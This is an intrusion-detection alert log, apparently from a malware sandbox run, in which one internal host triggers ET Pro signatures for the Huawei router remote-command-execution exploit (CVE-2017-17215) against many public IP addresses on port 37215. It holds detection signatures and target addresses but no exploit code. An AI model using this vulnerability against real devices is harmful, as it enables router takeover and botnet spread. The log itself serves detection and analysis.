                                                    07/10/24-08:26:13.766150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605837215192.168.2.1473.41.204.150
                                                    07/10/24-08:27:10.651918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052837215192.168.2.14197.108.127.254
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723637215192.168.2.1460.212.68.225
                                                    07/10/24-08:26:52.073471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070237215192.168.2.14197.116.80.110
                                                    07/10/24-08:27:11.520220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475837215192.168.2.14197.239.18.80
                                                    07/10/24-08:26:15.857451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677437215192.168.2.1441.168.202.81
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129637215192.168.2.1438.90.153.116
                                                    07/10/24-08:27:31.442738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943037215192.168.2.1441.242.247.62
                                                    07/10/24-08:26:13.659815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477437215192.168.2.1441.18.203.174
                                                    07/10/24-08:26:31.080592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163237215192.168.2.14197.220.126.38
                                                    07/10/24-08:26:57.666585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312037215192.168.2.14197.35.197.96
                                                    07/10/24-08:27:23.968110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455037215192.168.2.14157.215.140.7
                                                    07/10/24-08:27:33.849531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860837215192.168.2.1441.108.149.232
                                                    07/10/24-08:27:13.865748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897237215192.168.2.1441.4.127.118
                                                    07/10/24-08:27:28.070223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621237215192.168.2.14156.155.71.42
                                                    07/10/24-08:27:02.899646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329237215192.168.2.14189.247.186.120
                                                    07/10/24-08:27:11.490604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731037215192.168.2.1441.96.24.245
                                                    07/10/24-08:27:07.351373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259037215192.168.2.1441.225.167.185
                                                    07/10/24-08:26:47.819008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925037215192.168.2.14157.198.36.132
                                                    07/10/24-08:27:10.561915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187637215192.168.2.1441.68.215.161
                                                    07/10/24-08:27:19.253246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449037215192.168.2.1441.133.179.103
                                                    07/10/24-08:27:02.722958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966637215192.168.2.14177.195.6.59
                                                    07/10/24-08:26:43.688835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944437215192.168.2.1441.40.57.239
                                                    07/10/24-08:26:26.585190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800637215192.168.2.14101.77.120.207
                                                    07/10/24-08:27:28.180841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880037215192.168.2.14157.156.252.103
                                                    07/10/24-08:26:57.669115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680437215192.168.2.14197.145.231.60
                                                    07/10/24-08:26:13.666761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573237215192.168.2.14157.87.64.40
                                                    07/10/24-08:26:53.117247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843637215192.168.2.14197.12.84.184
                                                    07/10/24-08:26:13.832527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.1441.168.163.191
                                                    07/10/24-08:26:38.578082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677237215192.168.2.14157.178.165.77
                                                    07/10/24-08:26:43.846786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434237215192.168.2.1494.227.0.42
                                                    07/10/24-08:26:38.569924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249037215192.168.2.14218.53.198.84
                                                    07/10/24-08:27:05.072546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023437215192.168.2.14197.118.241.2
                                                    07/10/24-08:26:25.449751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312037215192.168.2.1441.34.67.138
                                                    07/10/24-08:26:14.757034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121237215192.168.2.14133.93.119.234
                                                    07/10/24-08:27:22.535302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480237215192.168.2.1441.66.159.162
                                                    07/10/24-08:26:20.145425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940637215192.168.2.14174.33.150.166
                                                    07/10/24-08:26:28.750932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761637215192.168.2.14197.8.133.239
                                                    07/10/24-08:27:22.889193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419037215192.168.2.1481.202.92.32
                                                    07/10/24-08:26:57.641375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168837215192.168.2.14197.243.245.122
                                                    07/10/24-08:26:28.782000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827837215192.168.2.1417.192.213.201
                                                    07/10/24-08:27:19.334471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448437215192.168.2.14157.31.31.203
                                                    07/10/24-08:26:48.012279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998637215192.168.2.14197.158.136.98
                                                    07/10/24-08:26:49.844919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.1441.136.49.62
                                                    07/10/24-08:27:05.141493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725237215192.168.2.14110.39.215.246
                                                    07/10/24-08:26:53.158324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588837215192.168.2.1441.217.127.40
                                                    07/10/24-08:27:02.841622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.14197.60.203.151
                                                    07/10/24-08:26:28.767416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915437215192.168.2.1441.31.254.153
                                                    07/10/24-08:27:19.285425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407037215192.168.2.1441.157.45.123
                                                    07/10/24-08:26:34.207710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483037215192.168.2.14154.98.59.31
                                                    07/10/24-08:27:19.148299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.1441.9.124.250
                                                    07/10/24-08:26:59.645443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598037215192.168.2.14157.156.2.78
                                                    07/10/24-08:27:33.965064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023437215192.168.2.14109.213.102.251
                                                    07/10/24-08:26:25.497334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935437215192.168.2.14197.206.154.165
                                                    07/10/24-08:26:59.841961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961437215192.168.2.14197.117.227.217
                                                    07/10/24-08:27:23.962795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434037215192.168.2.14197.73.168.8
                                                    07/10/24-08:26:34.194125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566237215192.168.2.1441.138.172.4
                                                    07/10/24-08:26:41.430084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555837215192.168.2.1441.118.160.0
                                                    07/10/24-08:27:02.815601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933037215192.168.2.14157.207.203.247
                                                    07/10/24-08:27:17.093189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109437215192.168.2.1441.207.185.4
                                                    07/10/24-08:27:19.303289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624037215192.168.2.14197.214.217.23
                                                    07/10/24-08:27:33.818731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833437215192.168.2.14157.213.218.11
                                                    07/10/24-08:26:43.737696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110837215192.168.2.14167.132.176.190
                                                    07/10/24-08:26:34.236926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142237215192.168.2.14169.27.174.140
                                                    07/10/24-08:27:32.593828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198437215192.168.2.14197.224.179.5
                                                    07/10/24-08:26:38.518951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687637215192.168.2.1441.230.251.138
                                                    07/10/24-08:26:59.688567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929237215192.168.2.1446.154.19.96
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.1441.192.10.86
                                                    07/10/24-08:26:20.091176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410237215192.168.2.14134.255.122.198
                                                    07/10/24-08:27:17.054152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148637215192.168.2.14157.105.55.182
                                                    07/10/24-08:27:33.850737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5163637215192.168.2.1441.30.169.211
                                                    07/10/24-08:26:53.209025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158637215192.168.2.14157.21.68.157
                                                    07/10/24-08:26:30.989109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782437215192.168.2.1436.178.85.39
                                                    07/10/24-08:26:59.821944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438637215192.168.2.14157.95.32.188
                                                    07/10/24-08:27:19.329520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645437215192.168.2.142.158.13.24
                                                    07/10/24-08:26:29.781419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144037215192.168.2.14157.175.145.173
                                                    07/10/24-08:26:36.388728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372437215192.168.2.14157.245.185.69
                                                    07/10/24-08:26:38.551619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562637215192.168.2.14157.47.164.212
                                                    07/10/24-08:26:49.811363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680837215192.168.2.14157.125.141.122
                                                    07/10/24-08:27:19.265818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568837215192.168.2.14197.253.226.241
                                                    07/10/24-08:26:11.588620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826037215192.168.2.1459.245.135.106
                                                    07/10/24-08:27:28.054333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053437215192.168.2.14197.185.1.208
                                                    07/10/24-08:27:10.609490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426637215192.168.2.1441.211.53.125
                                                    07/10/24-08:27:33.897837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656037215192.168.2.1441.234.193.229
                                                    07/10/24-08:26:15.875137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158037215192.168.2.1441.140.163.130
                                                    07/10/24-08:26:49.815817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732637215192.168.2.1441.247.86.49
                                                    07/10/24-08:27:02.923335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827237215192.168.2.14157.155.105.248
                                                    07/10/24-08:27:08.397659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782237215192.168.2.14157.166.1.185
                                                    07/10/24-08:27:20.412870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284237215192.168.2.14197.221.0.196
                                                    07/10/24-08:26:42.447281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108437215192.168.2.14139.154.40.185
                                                    07/10/24-08:27:33.744023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920037215192.168.2.1441.222.139.67
                                                    07/10/24-08:26:55.325101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642837215192.168.2.1441.169.140.48
                                                    07/10/24-08:26:22.289116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769037215192.168.2.14197.91.247.12
                                                    07/10/24-08:26:43.872664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.1441.89.158.39
                                                    07/10/24-08:27:10.632991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382637215192.168.2.14197.212.203.192
                                                    07/10/24-08:27:23.934350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881237215192.168.2.14197.170.177.226
                                                    07/10/24-08:26:36.367348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368237215192.168.2.1469.157.206.84
                                                    07/10/24-08:27:08.393293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059437215192.168.2.1441.83.170.199
                                                    07/10/24-08:26:51.983078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312637215192.168.2.1441.20.132.240
                                                    07/10/24-08:26:53.192031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942837215192.168.2.14157.108.107.169
                                                    07/10/24-08:27:13.857998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.1441.103.6.38
                                                    07/10/24-08:26:34.239596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295037215192.168.2.149.68.179.238
                                                    07/10/24-08:26:49.900161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898837215192.168.2.14157.178.190.199
                                                    07/10/24-08:27:11.484487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446037215192.168.2.14197.76.94.224
                                                    07/10/24-08:26:55.385824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808837215192.168.2.1441.236.234.243
                                                    07/10/24-08:27:23.960420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14167.195.221.159
                                                    07/10/24-08:27:05.129960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065837215192.168.2.1441.172.125.63
                                                    07/10/24-08:26:55.470125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306837215192.168.2.14157.121.242.248
                                                    07/10/24-08:26:23.351340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745037215192.168.2.14197.80.22.8
                                                    07/10/24-08:27:22.763927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479637215192.168.2.1441.41.241.21
                                                    07/10/24-08:26:43.865375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.1441.225.74.39
                                                    07/10/24-08:27:30.527827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994637215192.168.2.14157.20.45.72
                                                    07/10/24-08:26:57.644790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250637215192.168.2.14197.45.163.175
                                                    07/10/24-08:26:14.771167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469437215192.168.2.14157.253.171.76
                                                    07/10/24-08:26:51.970801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158437215192.168.2.14197.168.206.34
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555637215192.168.2.14197.154.175.232
                                                    07/10/24-08:27:33.769630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649637215192.168.2.14197.198.28.94
                                                    07/10/24-08:27:31.532371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472037215192.168.2.1441.19.119.86
                                                    07/10/24-08:26:41.503829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097437215192.168.2.1441.18.10.76
                                                    07/10/24-08:26:11.544307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889237215192.168.2.1441.3.38.86
                                                    07/10/24-08:27:10.619172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375837215192.168.2.1441.146.99.109
                                                    07/10/24-08:26:13.722263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396837215192.168.2.1441.224.17.93
                                                    07/10/24-08:27:02.812422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3532237215192.168.2.14157.236.195.136
                                                    07/10/24-08:26:38.609301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.14211.112.64.46
                                                    07/10/24-08:27:05.216046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141237215192.168.2.1441.41.1.249
                                                    07/10/24-08:27:17.044881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171437215192.168.2.1441.144.179.158
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683237215192.168.2.14197.232.240.249
                                                    07/10/24-08:26:17.990229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578837215192.168.2.14197.107.169.48
                                                    07/10/24-08:26:26.603231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043437215192.168.2.14197.236.151.102
                                                    07/10/24-08:26:38.636567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445237215192.168.2.1441.122.244.191
                                                    07/10/24-08:26:49.770059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401237215192.168.2.1441.77.13.20
                                                    07/10/24-08:27:31.459997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576037215192.168.2.14197.123.200.98
                                                    07/10/24-08:27:28.074173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679637215192.168.2.14157.233.85.115
                                                    07/10/24-08:26:43.703556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093437215192.168.2.1441.213.7.246
                                                    07/10/24-08:26:47.951146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086437215192.168.2.1441.1.182.122
                                                    07/10/24-08:26:59.879798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058037215192.168.2.14206.163.107.13
                                                    07/10/24-08:27:07.264352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429637215192.168.2.1441.226.215.97
                                                    07/10/24-08:26:47.994856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627437215192.168.2.14197.127.74.100
                                                    07/10/24-08:26:34.197956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360037215192.168.2.1441.180.225.227
                                                    07/10/24-08:26:59.562585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356237215192.168.2.14189.127.144.108
                                                    07/10/24-08:26:59.652000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851437215192.168.2.1441.82.90.154
                                                    07/10/24-08:26:51.973462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335637215192.168.2.1441.93.75.94
                                                    07/10/24-08:27:33.931783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610637215192.168.2.1441.218.17.254
                                                    07/10/24-08:27:14.867068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056837215192.168.2.14197.176.16.117
                                                    07/10/24-08:26:43.841867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381637215192.168.2.14157.19.193.128
                                                    07/10/24-08:27:19.278203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034637215192.168.2.14197.222.140.42
                                                    07/10/24-08:27:27.132803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163237215192.168.2.14149.98.80.143
                                                    07/10/24-08:26:53.184218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.14115.173.29.231
                                                    07/10/24-08:27:30.456446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714037215192.168.2.14197.141.245.166
                                                    07/10/24-08:26:28.907657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509837215192.168.2.14167.6.91.148
                                                    07/10/24-08:26:38.545437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538037215192.168.2.14159.108.18.241
                                                    07/10/24-08:26:57.655011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634837215192.168.2.14157.169.55.244
                                                    07/10/24-08:26:14.827128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338837215192.168.2.1443.223.71.171
                                                    07/10/24-08:26:22.270061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861437215192.168.2.14197.190.216.75
                                                    07/10/24-08:27:11.551943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125237215192.168.2.1441.229.20.80
                                                    07/10/24-08:26:59.881889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012237215192.168.2.14200.137.173.39
                                                    07/10/24-08:27:02.845068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768637215192.168.2.14157.56.251.72
                                                    07/10/24-08:27:03.003897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357037215192.168.2.1441.36.172.240
                                                    07/10/24-08:27:13.879293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081037215192.168.2.14197.96.210.39
                                                    07/10/24-08:27:13.905165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978237215192.168.2.14157.184.127.102
                                                    07/10/24-08:27:07.382774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050637215192.168.2.14197.85.226.142
                                                    07/10/24-08:27:10.699441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469637215192.168.2.14157.159.1.252
                                                    07/10/24-08:26:20.172014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892237215192.168.2.14157.207.137.196
                                                    07/10/24-08:27:22.872449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009837215192.168.2.1441.14.56.253
                                                    07/10/24-08:26:49.878090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200637215192.168.2.14157.185.96.87
                                                    07/10/24-08:26:59.559919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571837215192.168.2.14157.64.92.31
                                                    07/10/24-08:27:20.396105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804637215192.168.2.14157.137.194.216
                                                    07/10/24-08:26:18.022259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145037215192.168.2.14197.169.211.22
                                                    07/10/24-08:26:29.855668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.1444.82.221.138
                                                    07/10/24-08:26:52.077258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870037215192.168.2.14157.160.165.183
                                                    07/10/24-08:27:19.294251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803237215192.168.2.1441.145.131.133
                                                    07/10/24-08:27:20.424605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401237215192.168.2.1441.1.106.1
                                                    07/10/24-08:27:33.901645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473037215192.168.2.14174.112.238.252
                                                    07/10/24-08:26:48.027883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169037215192.168.2.1441.75.21.166
                                                    07/10/24-08:26:52.011560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184837215192.168.2.14197.189.50.26
                                                    07/10/24-08:27:22.936367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.14157.252.241.222
                                                    07/10/24-08:26:55.330413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132037215192.168.2.14157.143.103.46
                                                    07/10/24-08:27:33.821123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945837215192.168.2.1441.82.60.41
                                                    07/10/24-08:27:33.866007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754837215192.168.2.1441.187.79.163
                                                    07/10/24-08:26:18.005995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733837215192.168.2.1441.186.215.206
                                                    07/10/24-08:26:20.156560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324437215192.168.2.14123.58.186.236
                                                    07/10/24-08:27:20.470099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844237215192.168.2.14197.174.18.126
                                                    07/10/24-08:27:31.435309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318237215192.168.2.14157.164.31.190
                                                    07/10/24-08:26:13.790493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280837215192.168.2.14197.36.209.238
                                                    07/10/24-08:26:15.823696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975837215192.168.2.14197.222.33.32
